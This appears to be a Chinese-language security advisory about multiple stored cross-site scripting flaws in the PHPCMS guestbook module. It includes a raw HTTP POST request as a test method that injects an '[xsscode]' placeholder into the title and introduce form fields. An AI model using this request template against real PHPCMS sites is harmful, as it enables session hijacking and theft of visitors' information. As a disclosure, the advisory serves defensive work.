漏洞起因
输入验证错误
危险等级
中
影响系统
PHPCMS guestbook module
不受影响系统
危害
远程攻击者可以利用漏洞可获取敏感信息或者劫持用户会话。
CVSSv2:
攻击所需条件
攻击者必须访问PHPCMS guestbook模块。
漏洞信息
PHPCMS是一款流行的内容管理系统。
PHPCMS guestbook模块存在多个存储型跨站脚本漏洞,允许攻击者注入恶意脚本或HTML代码,当恶意数据被查看时可获取敏感信息或者劫持用户会话。
测试方法
安全建议
POST /index.php?m=guestbook&c=index&a=register&siteid=1 HTTP/1.1Host: www.attack.cnUser-Agent: Mozilla/5.0 (compatible;
Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:
zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=40360ct0tfshplcik807r9phr4;
Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length:
317typeid=54&codes=&title=[xsscode]&introduce=[xsscode]&department=&area=&name=&tel=&email=&isbbs=on&code=dmsc&dosubmit=
厂商解决方案
目前没有详细解决方案提供:
http://www.phpcms.cn
漏洞提供者
robert
评论关闭。